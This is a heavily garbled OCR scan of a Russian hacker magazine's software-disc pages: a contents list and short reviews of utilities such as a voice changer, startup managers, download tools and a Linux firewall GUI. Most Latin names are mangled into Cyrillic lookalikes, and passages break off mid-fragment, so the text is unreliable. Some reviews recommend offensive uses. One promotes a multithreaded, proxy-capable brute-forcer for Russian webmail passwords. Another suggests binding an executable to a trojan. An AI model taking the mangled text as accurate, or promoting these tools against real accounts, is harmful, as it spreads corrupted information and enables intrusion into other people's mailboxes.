РгіепсІІу СЬаІ ѵ.4.6.1 
Зоиізеек 1 .56 
ѴѴеаІЬег Риізе ѵ 2.04 
ІапСаІсиІаІог 1.0.1 
ТегпегОиагсІ 3.2 ” 

ЬапЗЬиШош 3.0.1 
ЗХВапсІМазІег 0.92 ЬиіІсі 1 
ОаІаРгееѵѵау 1.0.5.154 
ЬапЗру ѵ2.0 
ЗтаПРТР 1.1.985.6 
Ргоху СМескег 7.4.18 
РІазМѲоІ 0.5.7.8 
ВіІТоггепІ 4.0.1 
РігеТипе 0.6 = 

Ргезіі ОоѵѵпІоасІ 7.26 ” 

гтозсМапде 
0С++ ѵО.672 
Зкуре ѵі .2.0.32 
РГРІпІб 



ИЕТ 

ЗатМаіп 2.0.5а 
Копѵегзаііоп 0.16 
ЗатЬа 3.0.13 
Зкуре 1.0.0.20 
ЗОШе 3.2.0 
зуІрИеес! 1.9.6 



е0опкеу2000 1.1 
ѴѴеЬЗіІе ѴѴаІсЬег 4.03 
ЗІаІізІХР 9.8 
ОгЗоЙ РНР Есіііог 3.1.1 
АсІ МипсМег 4.7.16138 

8У8ТЕМ 

Казрегзку АпІіНаскег 
1.7.130 

Антивирус Касперского 
РегзопаІ 5.0.227 
Ведізігу Оеігадтепіаііоп 
ѵб.б 

ЗруѵѵагеВІазІег ѵЗ.З 
РСВоозІ 3.2.21 .2005 
РС05 

Казрегзку Іпіегпеі 
Зесигііу 2006 
Тѵѵеак-ХР Рго 4.05 
І\Іоп-51ор Сору 1.03 
ХруШ 

Мік ѴѴіпРІазМ ІаипсМег 
ѵі .5.3.6 

Зузіет СІеапир ѵі.5 
ЗресіаІ Тооіз 200х ѵі .3.5 
аТипег 1.9.5.6177 
РзТооІз Зиііе 
ѴѴогк ѴѴіІІі Ведізігу 



ОрепЗЗН 4.0 

$У$ТЕМ 

Ь2ір2 1.0.3 
Ксііт 0.6.5 
ХРгее86 4.5.0 
Рирру Ипих 1.0.0 АІрМа 



Ѵігіиаі СО 7.0 
Огіѵег СІеапег 3.3 

МІ$С 

Васкир То \)\Ід/Сд 
Ѵ5.1.128 

Тгие ІаипсМ Ваг ѵЗ.2.4 
(Ьеіа) 

N0115011 ІпзІаІІ Зузіет 
2.06 

ТеСопѵ 1.05 
ѴѴіпсІоѵѵВІіпсІз 4.5 
Хакер СО Оаіазаѵег 5.0 
Ыа1:игСаІепсІаг 5Т 
РШбеп Ргоіеззіопаі ѵі .0 
Скринсервер Магия Рун 1.0 
РооІ 30 Тгаіпіпд Есііііоп 
ѵі.4 

АІ ВоЬоРогт ѵб.3.0 
ЗеагсИ апсі Веріасе ѵ5.1 
Н0_5реес1 1.4.1.46 
ТаЫе 3.4 

Зіагі Мепи Типіпд 
Митіоск Саісиіаіог 3.3.214 
ІСЕ Воок Веасіег Рго 7.5 
Тѵѵеак Тоіаі Соттапсіег 
6.0.3 

РіпеРгіп15.37 



МІ8С 

МідІіІРаІ1 1.42 
055 3.99.2с 
бтк+ 2.6.4 & еиь 2.6.3 
діезі 1.0.10 
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ѵізиль наск ++ 

ѴізиаІНаск: СудѴѴіп: 
ехріоііз сотріііпд 

ѴізиаІНаск: Брутфорсер 
Нусіга 

Прохождение 
мартовского конкурса 



РЭР АВСНІѴЕ 

][АКЕР 

Пакер 2005 -02 (74) 

][АКЕР СПЕЦ 

][акер Спец 2005 -02 (51) 



МАОА2ІМЕ 

ШАРОѴѴАРЕ2 

АѴ Ѵоісе СЬапдег 
Зойшге ѵ4.0 
Аиіогипз ѵ 7.0 
Зрасез ѵ 1 .2 
ѴѴіпВІТЗ ѵ 0.8Ь 
ІІВІ.-АІЬит ѵ 1.31 
РІауаіТгаХ ѵ 1.77 
Сііітега Ѵігіиаі Оезкіор 
тападег (СѴО) ѵ 1 .2Ь 
ѴѴіпОігЗІаІ ѵ 1.1 



мс 

МоЬМе Сотриіегз 02 (53) 

ЛУЧШИЕ 

Й ИФРОВЫЕ 
АМЕРЫ 

Лучшие цифровые 
камеры 05 



Махіііоп Зіапсіагсі 1 .2.000 
РісІигезТоЕхе 4.40 Веіа 4 
РісаЗеІ Рііоіо Весоѵегу 
1.0.1 Веіа 

ТгаІІісСотргеззог 0.2Ь 
Виііс1 180 

ЗреесІРап 4.22 Веіа 6 
Х-5е1ир Рго 7.0 



ІІР0АТЕ5 

Обновления 
антивирусных баз АѴР 



ІЖІХѴѴАВЕ2 

ЫЕсІі1 ѵ 5.5 
Аеѵѵап ѵ 0.9.6 
Ма1Ьоша1ісѵ12.1е 
Шегеа ѵ 0.9.1 
Рігезіагіег ѵ 1.0.3 

х-тооьг 

ОикЗЫЫ МаіІ Вгиіег 3.03 
N^6 Вебігес12.0 Ьу Зѵѵііі 
Ііпіпзіаі ТооІ 
Тііе И013Р46 
ВаіпЬоѵѵСгаск 1 .2 

ТВАЗН 



ЖЕЛЕЗО 

Железо 12 







С ерьезно обновился один из лучших 
инструментов для изменения голоса. 
Мечта шутников, телефонных террористов и 
любителей караоке :). Как и прежде, пользо- 
ватель говорит в микрофон, а программа в 
реальном времени заставляет его голос зву- 
чать ниже (как у солидного мужика) или выше 
(как у женщины или подростка). Высоту и 
тембр голоса можно подбирать вручную, а 
можно использовать широкий набор готовых 
профилей (терминатор, старая женщина, 
тигр и т.д.). Движок АѴ Ѵоісе Оіапдег’а в оче- 
редной раз был переписан, что благотворно 
сказалось на качестве выходного сигнала. К 
тому же, программа стала поддерживать пла- 
гины, что, в принципе, сулит интересные 
перспективы. В качестве источника звука мо- 
жет использоваться не только микрофон, но 
и, скажем, выход программного трЗ-плеера. 
Новая фишка этой версии - модуль Ѵоісе 
Сотрагаіог, позволяющий согласовать звуча- 
ние своего голоса со специально выбранным 
образцом. Другими словами, если потребу- 
ется, АѴ Ѵоісе СИапдег запросто превратит 
тебя в знатного пародиста. На публике высту- 
пать ты не сможешь, но сетевые розыгрыши 
тебе станут по плечу (тем более что со всеми 
приложениями для интернет-телефонии эта 
прога отлично ладит :). 

А теперь ложка дегтя. Большинство самых 
вкусных фишек программы (дополнительные 
эффекты, продвинутые алгоритмы морфинга) 
в триальной версии просто-напросто не ра- 
ботают. Бесплатный ключ, который тебе вы- 
сылают после регистрации, проблему не ре- 
шает. Он снимает ограничение по времени, 
но АѴ Ѵоісе СІпапдег все равно продолжает 
работать в замкнутом деморежиме. Это до- 
вольно неприятно, хотя я более чем уверен, 
что к моменту появления журнала в продаже 
лекарство, способное справиться с данной 
болезнью, уже будет гулять по Сети. 



Зіге: 161 Кб 



ѵм.зузіпіегпаіз.сот 

О чередную бесплатную полезняшку утянул в этом ме- 
сяце с сайта 5у$іп(егпаІ$.соп. На этот раз в мои лапы 
попался менеджер автозагрузки. Как обычно, долго ра- 
довался качеству изделия. Во-первых, сразу бросилось 
в глаза, какое количество способов автозагрузки при- 
ложений знает эта утилита - стандартный МЗСопТід 
просто плачет и нервно курит в сторонке. Во-вторых, 
она позволяет держать под контролем не только запуск 
исполняемых файлов, но и инициализацию библиотек, 
загрузку расширений оболочки и браузера, активность 
системных служб. В-третьих, Аиіогипз может проверять 
цифровые подписи файлов. Эта фишка особенно хоро- 
шо сочетается с опцией Нісіе ЗідпесІ МісгозоЙ Епігіез, 
позволяющей убрать из списка стандартные компонен- 
ты операционной системы. Помимо проверки цифро- 
вой подписи, есть возможность одним кликом отпра- 
вить на боодіе.сот имя любого заинтересовавшего тебя 
файла в виде поискового запроса. 

Разумеется, помимо чисто информационных услуг, ути- 
лита Аиіогипз предоставляет и стандартный набор уп- 
равленческих функций. Проще говоря, с помощью этой 
проги ты можешь без труда выкинуть выбранные фай- 
лы из списка автозагрузки. Временно или навсегда. 

В общем, прога явно из разряда «тизі Ііаѵе». Все луч- 
шие черты этой породы имеются в наличии: и малый 
вес, и бесплатность, и работа без установки, и дружба 
с командной строкой. 
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ѴѴіпсІоѵѵз 9х/Ме/№/ХР 



ЗИагеѵѵаге 



5іге: 4159 Кб 
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Е ще один прототип трехмерного интерфейса 
для операционной системы ѴѴіпсІоѵѵз. Очень 
оригинальная, красивая и удобная разработка. 
Ее главное достоинство заключается в том, что 
она не заставляет пользователя отказываться 
от привычных удобных элементов управления 
окнами. Сам знаешь, другие проекты настойчи- 
во призывают юзера отринуть все старое и с 
головой окунуться в виртуальный мир, не пони- 
мая, что у нормальных людей нет времени на 
бессмысленные виртуальные полеты - им ра- 
ботать надо. К счастью, программа Зрасез 
юношеским максимализмом не страдает. Трех- 
мерным она делает только пространство рабо- 
чего стола, но не трогает панель задач. Да и ра- 
бочий стол она «отрехмеривает» не радикально - 
достаточно кликнуть по закладке с правой сторо- 
ны, чтобы на экране появилась обычная плос- 
кая область десктопа с расположенными на ней 
иконками. То есть, в принципе, работая с этой 
оболочкой, ты ничего не теряешь, но многое 
приобретаешь. Сворачиваемые тобой окна кра- 
сиво улетают вглубь экрана, чтобы прилипнуть 
к одной из двух пересекающихся под прямым 
углом плоскостей. Запутаться в приложениях 
невозможно, поскольку все открытые окна не 
налезают друг на друга и великолепно прос- 
матриваются. Один клик - и выбранное окно 
вылетает на передний план. И все, никаких 
лишних телодвижений! Это потом в свободную 
минутку можно уже копнуть Зрасез поглубже, 
поиграть с настройками и освоить дополни- 
тельные функции, такие как перетаскивание 
окон с одной плоскости на другую, быстрое пе- 
реключение вида, приближение/удаление и 
свободное вращение плоскостей вокруг верти- 
кальной оси. 





РОЗІХ, Мае 05 X, 05/2, МпсІоѵѵз 



Лицензия: 6ИІІ 6РЬ 
5іхе (в М): 1099 Кб 
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М ЕсІіІ - многофункциональный текстовый редактор для Х-ѴѴіпсІоѵѵ. Обладает табовым интерфейсом (при этом 
любой внутренний файл можно отсоединить в самостоятельное окно, а потом вернуть обратно) и такими 
свойствами, как перенос строк, если они не умещаются в текущую ширину окна, строка со статистикой файла 
(номер строки, столбца и байта позиции курсора, общий размер), поиск (с поддержкой обратного порядка, ре- 
гулярных выражений и учитывания регистра), настройка размеров разделений по символу ТаЬ (с возмож- 
ностью его эмуляции). Для программистов, помимо того, представлена нумерация строк и подсветка синтак- 
сиса для различных языков (среди которых С/С++, РазсаІ, РегІ, РуШоп, ТсІ, ЗИеІІ, 50Ц НТМІ_/ХМІ_, С55, 
^ѵазсгірТ ^ѵа - всего их около 30). Все настройки можно как сохранять по умолчанию, так и задавать инди- 
видуально для любого из открытых документов. Для желающих расширить возможности МЕсІіІ и сделать прог- 
рамму еще более удобной в использовании присутствуют макросы на своем Си-подобном языке. Организова- 
на взаимосвязь с консолью: редактор позволяет вставлять вывод произвольной команды зИеМ, нумеровать 
строки с помощью пі, сортировать с зогі, проверять орфографию с ізреІІ и т.п. Для оптимизации работы с боль- 
шими файлами предусмотрена возможность установки меток на выделенные части текста. В случае необходи- 
мости вставить какой-то специальный символ достаточно знать его номер в таблице А5СІІ и ввести в окно, 
всплывающее по СІгІ+М+і (на подобные комбинации клавиш забито множество функций программы). 
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ѴѴіпсІоѵѵв 2к/ХР 



5іге: 161 Кб 
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Ѵ іпВІТЗ - это графи- 
ческая оболочка для 
службы ВИЗ (ВаскдгоипсІ 
ІпіеІІідепІ: ТгапзТег 

Зегѵісе), входящей в сос- 
тав ѴѴіпсІоѵѵз 2к/ХР. 
Обычно указанная служ- 
ба используется прог- 
раммой ѴѴіпсІоѵѵз Іірсіаіе 
для незаметного скачи- 
вания патчей с сайта 
МісгозоЙ, но после установки утилиты ѴѴіпВІТЗ контроль переходит в руки поль- 
зователя, и он получает в свое распоряжение весьма оригинальный менеджер 
загрузки. Само собой, по количеству наворотов этот менеджер загрузки не мо- 
жет сравниться с лучшими представителями данной разновидности ПО, однако 
есть пара фишек, которые делают связку ВІТЗ+ѴѴіпВІТЗ поистине незаменимой. 
Во-первых, нужно вспомнить, что служба ВИЗ специально придумана для пере- 
дачи файлов в фоновом режиме. Она гораздо более корректно, чем обычные ме- 
неджеры загрузки, использует свободную полосу пропускания канала. Можно од- 
новременно качать файлы и ползать по сети, при этом никаких тормозов ты не 
почувствуешь. Во-вторых, нужно учесть, что ѴѴіпВІТЗ - это всего-навсего оболоч- 
ка. С ее помощью ты инициализируешь систему, формируешь новые задания и 
следишь за ходом работ, но закрытие этой утилиты никак не влияет на процесс 
передачи данных. 

В общем, смотри сам. Если ты не платишь за трафик и хочешь максимально ис- 
пользовать свой канал связи - ставь ѴѴіпВІТЗ. Пусть она потихоньку сливает тебе 
огромные файлы, пользуясь каждой минутой простоя. Обычную же качалку ис- 
пользуй лишь для тех файлов, которые необходимо загрузить как можно быстрее. 
Для нормальной работы утилиты необходимо, чтобы в системе был установлен 
МісгозоЙ .І\ІЕТ Ргатеѵѵогк 1 .1 . и включена служба ВаскдгоипсІ Іпіеііідепі Тгапз^ег Зегѵісе. 



РШѴОІТВаКІІ 1.77 
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ѴѴіпсІоѵѵз 9х/Ме/Ш2к/ХР 
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С тоило мне в прошлый раз 
рассказать о программе 
МеІѴізиаІіге Раѵогііез Огдапігег 
(ѵѵѵѵѵѵ.пеіѵізиаіііе.сот), как на хоро- 
шо известном своими классны- 
ми утилитами сайте аѵЙаЬ.ш од- 
на за другой стали появляться 
новые версии ІІВІ_-АІЬипл’а. Яс- 
ное дело, импортный визуаль- 
ный менеджер закладок был не- 
медленно списан в утиль, пос- 
кольку отечественный продукт делал его по всем параметрам. 

Главное преимущество ШІ_-АІЬит’а заключается в его браузеронезависимости. Про- 
га функционирует как совершенно самостоятельное приложение, а с Орега, Рігеіох, 
Іпіегпеі Ехріогег (и другими браузерами, построенными на его основе) взаимодей- 
ствует посредством плагинов. Естественно, как и другие проги этого вида, утилита 
ШІ_-АІЬипл позволяет организовать коллекцию ссылок в наглядном виде, сопровож- 
дая каждый адрес скриншотом веб-сайта. Данный скриншот с лихвой заменяет лю- 
бое, даже самое подробное описание, позволяя заложенной страничке не затеряться 
среди десятков (сотен? :)) других. Тем не менее, особо забывчивые все же могут до- 
бавить к любой графической закладке свой комментарий. 

Помимо этого, ШІ_-АІЬит разрешает группировать ссылки по темам, производить про- 
верку для выявления устаревших адресов, синхронизировать коллекции ссылок на раз- 
ных компьютерах, осуществлять операции импорта, экспорта и резервирования данных, 
вести поиск по различным параметрам и выполнять многие другие полезные операции. 



ѴІ/іікІоѵѵз 9х/Ме/№/ХР 
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Н е на шугку увлекся игрой в Соипіег-Зйіке (самая популярная игра в нашей 
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районной локалке). Соответственно, больше внимания обращаю на 
околоигровой софт, а в результате стал на днях обладателем аудиоплеера для 

игроманов. От своих сородичей этот плеер отличается тем, что умеет показывать свое окошко прямо во время игры. Кроме того, управлять им можно 
не только мышкой или с клавиатуры, но и с помощью геймпада, джойстика или рулевого колеса. Особо серьезным товарищам предлагается 
задействовать эксклюзивную функцию голосового контроля. 

Софтина поддерживает полноэкранные РігесІХ (от 6 до 9 версии) и ОрепОЬприложения, умеет воспроизводить файлы всех популярных медиаформатов и обладает всеми 
стандартными возможностями современного аудиопроигрывателя. То есть, помимо таких специфических модулей, как ОВР-редактор и монитор процессов, в РІауаІТгаХ 
есть и эквалайзер, и редактор плей-листов. Кстати, интересная деталь: к каждой игре может подгружаться необходимым образом отредактированный список песен. Чтобы 
во время кровавого мясного шутинга спокойная ВРб’шная музыка не сбивала настрой :). 

К сожалению, и РІауаІТгаХ требует для своей работы все тот же монструозный МісгозоЙ .МЕГ Ргатеѵѵогк 1.1. Больше, пожалуй, я об этой проге ничего тебе не скажу. 
Заинтересовался? Иди за подробностями на сайт или читай мануал. 
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І ычесывание мусора 
каталогов и подкаталогов 
с помощью обычного менед- 
жера файлов требует време- 
ни и внимания. Поэтому 
многие продвинутые това- 
рищи для быстрой очистки 
винчестера от мусора ис- 
пользуют специальный брау- 
зер ЗециоіаѴіеѵѵ, в окне кото- 
рого очень наглядно отобра- 
жается сразу все содержи- 
мое выбранного юзером дис- 
ка. Фишка в том, что файлы и 
каталоги выводятся на экран 
не в виде длинного-длинного 
списка, а в виде разноцвет- 
ных прямоугольников. Размер каждого прямоугольника зависит от размера 
файла, а цвет - от его типа. Соответственно, в окне программы хорошо прос- 
матриваются и большие файлы (даже распиханные по левым директориям :)), 
и массовые залежи графики, видео, плрЗ. То есть как раз те файлы, с изуче- 
ния которых обычно и начинают процедуру экстренной очистки винта! Клас- 
сно, правда? Одна беда: проект ЗециоіаѴіеѵѵ был давно заброшен автором, а 
все альтернативные проги до сих пор сильно уступали Секвойе по красоте и 
удобству интерфейса. Однако перед самой сдачей статьи я обнаружил в Сети 
утилиту ѴѴіпРігЗМ, в которой лучшие черты ЗециоіаѴіеѵѵ сочетаются с массой 
оригинальных нововведений, среди которых особенно хочется отметить пра- 
вильно доработанный интерфейс, поддержку русского языка и возможность 
написания и использования собственных процедур автоматического удаления 
ненужных файлов. Поверь мне, приятель, эту прогу нужно срочно качать и юзать. 
Сугубо положительные впечатления от общения с ней тебе гарантируются. 
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Мікіоиіз 95/98/2К/ХР/2003 
ЗПагеѵѵаге 



Зіге: 15556 Кб 
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И ожно ли прицепить ехе-файл к графическому файлу? Пожалуйста, не за- 
давай этого вопроса в 10001 раз! Да, подобное возможно, если восполь- 
зоваться одной из последних уязвимостей ІЕ. Но долго ли просуществует эта 
дырка? Есть другое универсальное решение: софтина создает слайд-шоу, ко- 
торое и упаковывает в обыкновенное исполняемое файло. Исполняемый же 
файл может быть идеально соединен с конем семейства троянских. Если же 
ты вовсе не собираешься творить виртуальный беспредел, но хочешь просто 
создать красивую презентацию, софт тоже не разочарует: фишек для оформ- 
ления целое море. Слайд-шоу можно также утрамбовать в зсг-файлик, то есть 
создать продвинутый скринсейвер. 
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РІШЕТ РНОТО КЕШЕНУ 1.0.1 ВЕТЛ 
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11 ногда мне кажется, что я перегрет. Такого 


95/98/МЕ/2К/ХР/2003 


И впечатления никогда не возникает в отно- 


Ргееѵѵаге 


шении моего процессора, ибо за его темпера- 
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турой присматривает ЗреебРап. Помимо тем- 
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рость работы и вольтаж других железок систе- 




мы. Она работает с хардами по технологии 
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5.М.А.В.Т. В случае отдельных девайсов мож- 
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но даже менять Р5В. ЗреебРап особенно удо- 




бен тем, что может снижать скорость враще- 




ния кулеров, чтобы экономить драгоценную 




электроэнергию и снижать шум системы. Это 
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не первый монитор железа в моем богатом 




опыте обозревателя, но именно со ЗреебРап я 
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не совладал, не сумев заставить измерять 
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температуру моих хардов. 




) 



088 ВЕІ.ЕП8Е 0ІСЕ8Т; ІІЕСТОКЫВІІК 5.0 80Н0 



В ышла новая версия дистрибутива Ѵес!огІ_іпих БОНО (зтаІІ оЯісеДюте оТСісе) 
5.0, основанного ЗІаскѵѵаге І_іпих 10.1 . Среди ключевых изменений: значитель- 
ные обновления в административной утилите ѴА5М и появление системы управле- 
ния пакетами с проверкой зависимостей ѴЕАРТ (на основе 31ар!-де!). Разработчи- 
ками был полностью переписан инсталлятор: в нем улучшено автоматическое рас- 
познавание железа и выбор пакетов, а изменения в загрузочных скриптах привели 
к сокращению времени загрузки на 50%. Среди программного обеспечения в 
Ѵес!огІ_іпих 5.0 50НО: графическая среда КОЕ 3.3.2 и оконный менеджер ІсеѴѴМ 
1.2.13, ѵѵеЬ-браузер РігеТох 1.0, клиент обмена сообщениями Сіаіт 1.1.2, дР!р и 
КазаЫапса для работы с РТР, почтовый клиент Зуіріпееб. Из других пакетов: 
ОрепОЯісе.огд 1.1.4, АЬіѵѵогб, КопМ, КМуМопеу, ОпиСазІі и ОНАсс; ОСАО 2.0.33, 
ЗсгіЬиз 1.2, Сігпр 2.2.1, ВІепсІег 2.34, Роѵгау и Іпкзсаре; ХАМРР, ВІиеТізІі 0.13, 
Оиап!а 3.3.2, СЗЗЕбйог 0.2.1 . 
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Только самый ленивый ко- 
I дер не выпустил собствен- 
ного Іѵѵеакег’а для винды. 
Большинство подобных 
приблуд ничем не отличают- 
ся друг от друга, их един- 
ственная цель - похитить 
твой инетный трафик и мес- 
то на винте. Х-Зе!ир - насто- 
ящий Х-настройщик, кото- 
рый стройно впишется в 
твой хакерский софтовый 
арсенал. Приятная фича 
проги прячется в полноцен- 
ной поддержке І_опдІтот, ко- 
торый уже год как захватил 
один из моих компов. По умолчанию прога запускает настройщик через назойли- 
вый ѴѴігагб. Использовать его - пустая трата времени, значительно проще сконфи- 
гурировать все необходимое ручками. Софтина обещает позаботиться о 1700 
скрытых опциях винды. Мне понравилась возможность сохранить настройки одно- 
го компа и безболезненно перенести их на другой. Последняя версия умеет тюнить 
еще не установленную винду, проводя ряд изменений прямо в дистрибутиве. 
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І ять лет назад еще можно 
было удивить кого-то об- 
ладанием цифровика. Сейчас 
это абсолютный таіпзігеапл, и 
удивиться ты сможешь лишь 
неприятному сюрпризу - по- 
тере отснятых фоток. Иногда 
подобное случается беспри- 
чинно с копеечными ноуней- 
мами или после неосторожно- 
го форматирования их более именитых и породистых собратьев. Прога поз- 
воляет восстанавливать потерянные картинки с карт МегтюгуЗбск, 
СоплрасІРІазІі, ЗесигеОідіІаІ, МісгоРгіѵе. Если интерфейс софтины понравится, 
можно поставить вполне рабочий вьюер от того же производителя. 
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Т ы уже заколебался платить несметные тысячи за СРПЗ-трафик? Хватит. Те- 
бя пришли спасать. Данная тулза сожмет твой интернет-трафик почти 
вдвое, а расходы могут упасть на 60% ! Конечно же, тема будет актуальна и в 
локалках с дорогим трафиком. Благо подобных мест остается меньше и мень- 
ше, так что заточена прога явно под работу с ОРВЗ и ЕОСЕ. К сожалению, по- 
ка Т гаІТісСот ргеззог умеет сжимать лишь текстовый трафик. Так что прога 
окажется полезной в первую очередь для сжатия пеѵѵз-серверного, почтового 
и ІСО-трафика. С браузером тоже обламываться не придется: выключив по 
старинке отображение картинок, ты также сможешь экономить на ѵѵеЬ-сер- 
финге. Поддержку сжатия картинок обещают сделать в следующей версии. 
Запариваться с настройкой не придется, так как все уже приготовлено для 
безболезненной работы. 



ИЗ ПРУ ГИК РЕЛИЗОВ 



З Іаскѵѵаге І_іпих 10.1 , АрасИе 2.0.53, ѴеІІоѵѵ Род І_іпих 4.0.1 , Х.Огд 6.8.2, Веб На! 

Епіегргізе І_іпих4.0, ЗІагОІТісе 8 Ве!а, СІМОМЕ 2.8.3 и 2.10 Ве!а 2, Мапбгакеііпих 
10.2 Ье!а 3, РігеТох 1.0.1, Ібпеох Епіегргізе І_іпих 4.0, КОЕ 3.4 ВС1 , МогіІІа 1 .8 Ве!а 
1 , СЮѵіеѵѵ 2.0.0, 1_іпих 2.6.1 1 , ОрепОТСісе.огд 2.0 Ве!а. 
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Т ы можешь настаивать на том, что Орега и РігеРох 
давно научили ІЕ сосать. Однако последние пять 
лет я не вылезаю из чрева М5-детища. Иногда 
лишь хочется чего-нибудь новенького. Тогда при- 
ходят на помощь другие браузеры, которые рабо- 
тают на базе все того же ІЕ. Изобретение велоси- 
педа? Быть может, хотя предлагаемый образец по- 
шел еще дальше - это новая версия браузера на 
базе уже существовавшего проекта МуІЕ2. Одна из 
очевидных фишек софтины - поддержка скинов. 
Можно обвешать агрегат шкурами по самое не ба- 
луйся! Мне самому очень пришлась по вкусу рабо- 
та с новомодными П55-ресурсами прямо в окне 
браузера. На №р://тахШоп.іагараде$.сопл ты можешь 
найти десятки других плагинов для МахМіоп на все 
случаи своей нелегкой хакерской жизни. 
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Н МаІІіотайс - мощная консольная математическая программа, разрабатываемая с 1 986 года и с завидной ре- 
гулярностью обновляемая по сей день. Всего в нее заложено 34 команды, комбинируя которые, можно выпол- 
нять элементарные арифметические операции и работать со структурами высшей математики. Среди функций 
Маіііотаііс - деление многочленов, сравнение и упрощение выражений, раскрытие скобок и степеней по прави- 
лам и формулам, решение уравнений, дифференцирование и интегрирование, нахождение минимумов, макси- 
мумов и пределов, разложение по Тейлору, поддержка комплексных чисел (выделение мнимой и действительной 
частей, нахождение всех комплексных корней уравнения), математическое суммирование и умножение (по изме- 
няющимся от одного до другого значения переменным). Присутствует также, 
например, удобная команда ІаІІу для последовательного сложения большого 
количества чисел (после ввода нового элемента суммы и нажатия <ЕпІег> по- 
казывают текущий результат и приглашение для следующего слагаемого). Все 
вводимые и выводимые данные программа преобразует в правильный и удобо- 
читаемый вид (добавляет пропущенные знаки умножения, по возможности ме- 
няет десятичные дроби на обыкновенные, которые представляются вертикаль- 
но, раскрашивает части выражений и т.п.). Предусмотрена возможность дли- 
тельных вычислений: для этого все текущие значения и функции сохраняются в 
файл и затем могут быть загружены при следующем запуске программы для 
продолжения работы с уже определенными (полученными и введенными) дан- 
ными. Чтобы не потеряться во всех предлагаемых услугах, в Маіііотаііс есть 
подробная встроенная справка. 

* Порт для ѴѴіпсІоѵѵз работает через Судѵѵіп, доступен для скачивания на сайте 
программы. 
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ігезіаііег - графическая оболочка 
для настройки ТігеѵѵаІГа в среде 
СШМЕ в І_іпих. Уже при первом за- 
пуске программы по приветствию 
мастера начальной настройки сразу 
определяются основные цели разра- 
ботчиков: они попытались сделать 
максимально удобный с пользова- 
тельской точки зрения интерфейс 
для облегчения работы с межсете- 
вым экраном в Шпих-ядрах 2.4 и 2.6. 
Всего у Рігезіагіег три вкладки: статус 
с информацией о текущем положе- 
нии сети (трафик и активность для 
каждого устройства, действующие на 
момент подключения), события с 
данными о заблокированных подклю- 
чениях (время, порт, источник, про- 
токол, сервисы для известных портов 
и т.п.), список правил. Сама полити- 
ка задается отдельно для входящего 
и исходящего трафика, содержимое 
у правил очень простое и строится по 
схеме ірІаЫез: запретить/разрешить 
подключения для ІР/хоста/подсети на 
такие-то сервисы/порты (можно до- 
бавлять комментарии, чтобы не за- 
быть, почему, собственно, кому-то что-то разрешено). Все эти условия могут мгно- 
венно приводиться в действие (при включении соответствующей опции). Отобра- 
жамые события можно фильтровать по хостам, портам и, например, если местом 
назначения пакета не является ТігеѵѵаІІ. Обеспечена поддержка протокола динами- 
ческой конфигурации ОНСР для локальной сети, а также фильтрация ІСМР-пакетов 
(во избежание Роб-атак) и ТоЗ (Туре оі Зегѵісе), блокирование Ьгоасісазі-трафика. 
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Зіге: 201 Кб 
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В последнее время все большую популярность в интернете набирает формат 
В55 - особенно это актуально для сетевых СМИ. Шіегеа расшифровывает- 
ся как І_іпих РеесІ Веасіег, основывается на библиотеке ОТК+ (использует дви- 
жок СКкНТМІ_2 или МогіІІа) и предназначен для удобного сбора и чтения новос- 
тей и других данных в форматах РЮР/В53, СОР, АІопл/ЕсІпо/РІЕ 0.2, ОРМІ_ 1 .0 и 
ОС5 0.4 (определение типа проводится автоматически). Для П55 поддержи- 
ваются (иногда частично) некоторые модули (среди них ОиЫіп Соге, 
Ргезіітеаі, Зупсіісаііоп и другие). Настройки Шегеа позволяют задавать число 
новостей для кэширования, время автоматического обновления лент по умол- 
чанию, однако для каждой подписки эти параметры могут быть заданы от- 
дельно (данные о периодичности обновлений по желанию берутся из устано- 
вок источника, если таковая опция в нем присутствует). Программа сама на- 
ходит иконки сайтов и размещает их возле названий соответствующих лент, 
способна открывать ссылки (на которые ведут элементы из источников) как в 
своем окне, так и во внешнем браузере. Списки лент экспортируемы и импор- 
тируемы. Присутствует поиск новостей с возможностью создания каталогов, 
в которые помещаются найденные элементы. Сообщения о получении новых 
данных из источников могут показываться в виде всплывающих окон. 




С пешу представить твоему вниманию отличный бругфорсер для таких популярных русских почтовых сервисов, 
как паіі.ги, Ьк.ги, Іізі.ги, уапсіех.ги, іпЬох.ги, уаііоо.сот и еще двух десятков доменов. Как и любой уважающий себя пе- 
реборщик паролей, РикЗММ МаіІ Вгиіег может обрабатывать список пасс-комбинаций из файла (в таком форма- 
те: изег@ботаіптаіІ;раз5ѵѵогсІ) или же атаковать в лоб - посимвольно (здесь можно настроить длину подбирае- 
мого пароля, символы, из которых он состоит, и кое-что другое). Программа многопоточна (1-255 возможных со- 
единений) и поддерживает работу через прокси-серверы. Кстати, если при авторизации на сервере использует- 
ся плсІ5-хэширование логина или пароля, то не спеши паниковать - софтина справится и с такой задачей. Каким 
бы это ни казалось банальным, но одной из главных и полезных опций брутфорсера является звуковое оповеще- 
ние (ріау зоипсі ѵѵііеп разз із ТоипсІ) при нахождении верного пароля, который, кстати, автоматически записывает- 
ся в файл, указанный в настройках. 

В общем, выросла достойная замена Брутусу. Попробовать нужно обязательно :). 
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Ч его только не понапридумывали для нас с тобой, чтобы использование ІСО-клиента было максимально у 
н 



ным и эффективным. Эта программа от нашего соотечественника позволяет перенаправлять сообщения с од- г 
ного уина на другой. Не понял? Поясняю. Представь такую ситуацию: ты дорожишь своим номером аськи, кото- 
рый у тебя, естественно, красивый. А иначе ты зря, что ли, X читаешь? Итак, собрался ты однажды в компью- 
терный клуб или любое другое компово-инетное место, хозяин которого не вызывает у тебя доверия. Людей,! 
падких на чужие красивые уины, много, сам понимаешь. Тогда ты запускаешь дома свой номерок в онлайн на| 
пару с Редиректом, настраиваешь перенаправляемый номерок (свежий кривой девятизнак), а в гостях уже с этой девятки выходишь чатить- Г 
ся. Все сообщения, которые приходят на твой реальный номер, форвардятся от имени твоего крутого номера к девятизначному. Твои от- 1 
веты уходят назад по такому же принципу. Вообще, программе можно найти еще очень много применений, о которых сразу и не подума- 
ешь. Приятные мелочи соблюдены: логирование сообщений, смена статуса номера, возможность выбора ІСО-сервера и многое другое. 
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О ЙегЗІер - современная реализация леген- 
дарной графической оболочки №)(Г5ТЕР (ре- 
лиз 1 .0 для компьютеров №ХТ вышел в 1989 го- 
ду). Несмотря на то что проект стремится не от- 
ходить от уже древних идеологических концеп- 
ций, оконный менеджер является вполне конку- 
рентоспособной альтернативой более популяр- 
ным оболочкам и наделен всеми необходимыми 
функциями. Добавив к этому исключительный 
внешний вид и продуманность интерфейса, мож- 
но только удивляться относительно небольшой 
распространенности АЙегЗІер. Основные эле- 
менты оконного менеджера (в его стандартном 



виде): панель с иконками приложений (ѵѵІіагТ), 
список окон запущенных программ, пейджер, 
